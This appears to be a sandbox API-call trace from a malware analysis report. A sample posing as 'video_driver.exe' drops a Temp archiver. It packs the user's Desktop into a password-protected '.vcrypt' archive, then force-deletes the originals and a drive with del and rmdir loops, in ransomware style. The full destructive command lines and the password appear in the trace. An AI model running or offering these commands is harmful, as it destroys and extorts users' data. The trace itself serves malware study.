[0069.952] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.952] GetFileType (hFile=0x7) returned 0x2 [0069.953] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.953] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef2b4 | out: lpMode=0x3ef2b4) returned 1 [0069.953] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.953] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef2e0, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef2e0*=0x2) returned 1 [0069.954] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0069.954] _vsnwprintf (in: _Buffer=0x4a415e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x3ef2f0 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0069.954] _vsnwprintf (in: _Buffer=0x4a415e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x3ef2f0 | out: _Buffer=">") returned 1 [0069.954] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.954] GetFileType (hFile=0x7) returned 0x2 [0069.955] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.955] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef2b8 | out: lpMode=0x3ef2b8) returned 1 [0069.955] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.955] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a415e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x3ef2e4, lpReserved=0x0 | out: lpBuffer=0x4a415e40*, lpNumberOfCharsWritten=0x3ef2e4*=0x26) returned 1 [0069.956] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.956] GetFileType (hFile=0x7) returned 0x2 [0069.956] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.956] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef50c | out: lpMode=0x3ef50c) returned 1 [0069.956] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.956] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7de4d0*, nNumberOfCharsToWrite=0x31, lpNumberOfCharsWritten=0x3ef538, lpReserved=0x0 | out: lpBuffer=0x7de4d0*, lpNumberOfCharsWritten=0x3ef538*=0x31) returned 1 [0069.957] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef544 | out: _Buffer=" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ") returned 168 [0069.957] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.957] GetFileType (hFile=0x7) returned 0x2 [0069.957] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.957] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef504 | out: lpMode=0x3ef504) returned 1 [0069.958] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.958] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0xa8, lpNumberOfCharsWritten=0x3ef530, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef530*=0xa8) returned 1 [0069.959] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3ef560 | out: _Buffer=" & ") returned 3 [0069.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.959] GetFileType (hFile=0x7) returned 0x2 [0069.959] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.959] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef520 | out: lpMode=0x3ef520) returned 1 [0069.959] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.959] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef54c, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef54c*=0x3) returned 1 [0069.960] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.960] GetFileType (hFile=0x7) returned 0x2 [0069.960] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.960] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4dc | out: lpMode=0x3ef4dc) returned 1 [0069.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.961] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7de858*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef508, lpReserved=0x0 | out: lpBuffer=0x7de858*, lpNumberOfCharsWritten=0x3ef508*=0x3) returned 1 [0069.961] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef514 | out: _Buffer=" /f /s /q \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 52 [0069.961] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.961] GetFileType (hFile=0x7) returned 0x2 [0069.961] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.961] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0069.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.962] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x34) returned 1 [0069.962] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3ef530 | out: _Buffer=" & ") returned 3 [0069.962] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.962] GetFileType (hFile=0x7) returned 0x2 [0069.962] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.962] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4f0 | out: lpMode=0x3ef4f0) returned 1 [0069.963] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.963] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef51c, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef51c*=0x3) returned 1 [0069.963] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x3ef514 | out: _Buffer="FOR") returned 3 [0069.963] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.963] GetFileType (hFile=0x7) returned 0x2 [0069.963] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.963] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0069.964] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.964] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x3) returned 1 [0069.964] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %S", _ArgList=0x3ef514 | out: _Buffer=" /") returned 2 [0069.964] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.964] GetFileType (hFile=0x7) returned 0x2 [0069.964] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.964] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0069.965] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.965] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x2) returned 1 [0069.966] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x3ef514 | out: _Buffer=" %p IN ") returned 7 [0069.966] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.966] GetFileType (hFile=0x7) returned 0x2 [0069.966] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.966] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0069.966] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.966] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0x7) returned 1 [0069.967] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x3ef510 | out: _Buffer="(\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\") do ") returned 47 [0069.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.967] GetFileType (hFile=0x7) returned 0x2 [0069.967] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.967] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d0 | out: lpMode=0x3ef4d0) returned 1 [0069.967] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.967] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2f, lpNumberOfCharsWritten=0x3ef4fc, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef4fc*=0x2f) returned 1 [0069.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.968] GetFileType (hFile=0x7) returned 0x2 [0069.968] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.968] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4dc | out: lpMode=0x3ef4dc) returned 1 [0069.968] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.968] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7dea10*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x3ef508, lpReserved=0x0 | out: lpBuffer=0x7dea10*, lpNumberOfCharsWritten=0x3ef508*=0x5) returned 1 [0069.968] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x3ef514 | out: _Buffer=" \"%p\" /s /q ") returned 12 [0069.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.969] GetFileType (hFile=0x7) returned 0x2 [0069.969] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.969] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef4d4 | out: lpMode=0x3ef4d4) returned 1 [0069.969] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.969] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x3ef500, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef500*=0xc) returned 1 [0069.970] _vsnwprintf (in: _Buffer=0x4a424640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x3ef594 | out: _Buffer="\r\n") returned 2 [0069.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.970] GetFileType (hFile=0x7) returned 0x2 [0069.970] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0069.970] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x3ef554 | out: lpMode=0x3ef554) returned 1 [0069.970] _get_osfhandle (_FileHandle=1) returned 0x7 [0069.970] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a424640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x3ef580, lpReserved=0x0 | out: lpBuffer=0x4a424640*, lpNumberOfCharsWritten=0x3ef580*=0x2) returned 1 [0069.971] GetConsoleTitleW (in: lpConsoleTitle=0x3ef0a0, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0069.973] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x7c29e8, lpFilePart=0x3eebc0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x3eebc0*="Temp") returned 0x24 [0069.973] SetErrorMode (uMode=0x0) returned 0x1 [0069.973] GetProcessHeap () returned 0x7b0000 [0069.973] RtlReAllocateHeap (Heap=0x7b0000, Flags=0x0, Ptr=0x7c29e0, Size=0x68) returned 0x7c29e0 [0069.973] GetProcessHeap () returned 0x7b0000 [0069.973] RtlSizeHeap (HeapHandle=0x7b0000, Flags=0x0, MemoryPointer=0x7c29e0) returned 0x68 [0069.974] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\.") returned 1 [0069.974] GetProcessHeap () returned 0x7b0000 [0069.974] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0x58) returned 0x7c5de0 [0069.974] GetProcessHeap () returned 0x7b0000 [0069.974] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xa4) returned 0x7c64c8 [0069.974] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0069.974] FindFirstFileExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe", fInfoLevelId=0x1, lpFindFileData=0x3ee95c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3ee95c) returned 0x7bf7e8 [0069.974] FindClose (in: hFindFile=0x7bf7e8 | out: hFindFile=0x7bf7e8) returned 1 [0069.974] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0069.974] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0069.974] GetConsoleTitleW (in: lpConsoleTitle=0x3eee34, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\video_driver.exe") returned 0x36 [0069.975] InitializeProcThreadAttributeList (in: lpAttributeList=0x3eecbc, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3eed84 | out: lpAttributeList=0x3eecbc, lpSize=0x3eed84) returned 1 [0069.975] UpdateProcThreadAttribute (in: lpAttributeList=0x3eecbc, dwFlags=0x0, Attribute=0x60001, lpValue=0x3eed7c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3eecbc, lpPreviousValue=0x0) returned 1 [0069.975] GetStartupInfoW (in: lpStartupInfo=0x3eec78 | out: lpStartupInfo=0x3eec78*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x13, lpReserved2=0x7b1c30, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0069.975] lstrcmpW (lpString1="\\mod_01.exe", lpString2="\\XCOPY.EXE") returned -1 [0069.975] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe", lpCommandLine="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3eed18*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3eed64 | out: lpCommandLine="\"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\mod_01.exe\" a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt\" \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*\" ", lpProcessInformation=0x3eed64*(hProcess=0x80, hThread=0x78, dwProcessId=0x53c, dwThreadId=0x7e8)) returned 1 [0070.064] CloseHandle (hObject=0x78) returned 1 [0070.064] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0070.064] GetProcessHeap () returned 0x7b0000 [0070.064] HeapFree (in: hHeap=0x7b0000, dwFlags=0x0, lpMem=0x7c9700 | out: hHeap=0x7b0000) returned 1 [0070.064] GetEnvironmentStringsW () returned 0x7dea70* [0070.064] GetProcessHeap () returned 0x7b0000 [0070.064] RtlAllocateHeap (HeapHandle=0x7b0000, Flags=0x8, Size=0xb5c) returned 0x7df5d8 [0070.064] FreeEnvironmentStringsW (penv=0x7dea70) returned 1 [0070.064] WaitForSingleObject (hHandle=0x80, dwMilliseconds=0xffffffff) Process: id = "20" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x457d2000" os_pid = "0x808" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"A:\" del /f /s /q \"A:\" & FOR /D %p IN (\"A:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x818 [0056.691] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fd9c | out: lpSystemTimeAsFileTime=0x14fd9c*(dwLowDateTime=0x1485d80, dwHighDateTime=0x1d62400)) [0056.691] GetCurrentProcessId () returned 0x808 [0056.691] GetCurrentThreadId () returned 0x818 [0056.691] GetTickCount () returned 0x1146597 [0056.691] QueryPerformanceCounter (in: lpPerformanceCount=0x14fd94 | out: lpPerformanceCount=0x14fd94*=17682454734) returned 1 [0056.695] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0056.696] __set_app_type (_Type=0x1) [0056.696] __p__fmode () returned 0x770331f4 [0056.696] __p__commode () returned 0x770331fc [0056.696] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0056.696] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0056.696] GetCurrentThreadId () returned 0x818 [0056.696] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x818) returned 0x60 [0056.696] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0056.697] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0056.697] SetThreadUILanguage (LangId=0x0) returned 0x409 [0056.697] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0056.697] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14fd2c | out: phkResult=0x14fd2c*=0x0) returned 0x2 [0056.697] VirtualQuery (in: lpAddress=0x14fd63, lpBuffer=0x14fcfc, dwLength=0x1c | out: lpBuffer=0x14fcfc*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0056.697] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14fcfc, dwLength=0x1c | out: lpBuffer=0x14fcfc*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0056.697] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14fcfc, dwLength=0x1c | out: lpBuffer=0x14fcfc*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0056.697] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14fcfc, dwLength=0x1c | out: lpBuffer=0x14fcfc*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0056.697] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14fcfc, dwLength=0x1c | out: lpBuffer=0x14fcfc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0056.697] GetConsoleOutputCP () returned 0x1b5 [0056.698] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0056.698] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0056.698] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.698] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0056.698] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.698] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0056.698] _get_osfhandle (_FileHandle=1) returned 0x7 [0056.698] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0056.699] _get_osfhandle (_FileHandle=0) returned 0x3 [0056.699] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0056.699] GetEnvironmentStringsW () returned 0x4a20f8* [0056.699] GetProcessHeap () returned 0x490000 [0056.699] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xaca) returned 0x4a2bd0 [0056.699] FreeEnvironmentStringsW (penv=0x4a20f8) returned 1 [0056.699] GetProcessHeap () returned 0x490000 [0056.700] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0x4) returned 0x4a1898 [0056.700] GetEnvironmentStringsW () returned 0x4a20f8* [0056.700] GetProcessHeap () returned 0x490000 [0056.700] RtlAllocateHeap (HeapHandle=0x490000, Flags=0x8, Size=0xaca) returned 0x4a36a8 [0056.700] FreeEnvironmentStringsW (penv=0x4a20f8) returned 1 [0056.701] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec9c | out: phkResult=0x14ec9c*=0x68) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x0, lpData=0x14eca8*=0x0, lpcbData=0x14eca0*=0x1000) returned 0x2 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x1, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x0, lpData=0x14eca8*=0x1, lpcbData=0x14eca0*=0x1000) returned 0x2 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x0, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x40, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x40, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x0, lpData=0x14eca8*=0x40, lpcbData=0x14eca0*=0x1000) returned 0x2 [0056.701] RegCloseKey (hKey=0x68) returned 0x0 [0056.701] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14ec9c | out: phkResult=0x14ec9c*=0x68) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x0, lpData=0x14eca8*=0x40, lpcbData=0x14eca0*=0x1000) returned 0x2 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x1, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.701] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x0, lpData=0x14eca8*=0x1, lpcbData=0x14eca0*=0x1000) returned 0x2 [0056.702] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x0, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.702] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x9, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.702] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x4, lpData=0x14eca8*=0x9, lpcbData=0x14eca0*=0x4) returned 0x0 [0056.702] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14eca4, lpData=0x14eca8, lpcbData=0x14eca0*=0x1000 | out: lpType=0x14eca4*=0x0, lpData=0x14eca8*=0x9, lpcbData=0x14eca0*=0x1000) returned 0x2 [0056.702] RegCloseKey (hKey=0x68) returned 0x0 [0056.702] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b65 [0056.702] srand 